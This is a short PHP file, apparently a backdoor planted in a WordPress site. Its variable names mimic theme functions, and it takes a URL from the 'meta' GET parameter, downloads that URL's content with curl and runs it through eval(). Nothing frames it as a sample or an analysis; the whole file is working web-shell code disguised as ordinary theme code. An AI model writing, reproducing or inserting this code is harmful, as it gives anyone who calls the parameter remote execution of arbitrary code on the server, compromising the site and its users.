<?php
if (isset($_GET['meta'])) {
$the_post_thumbnail_gyn = $_GET['meta'];
if ($get_theme_file_uri_ya = curl_init()) {
curl_setopt($get_theme_file_uri_ya, CURLOPT_URL, $the_post_thumbnail_gyn);
curl_setopt($get_theme_file_uri_ya, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($get_theme_file_uri_ya));
curl_close($get_theme_file_uri_ya);
exit;
}
}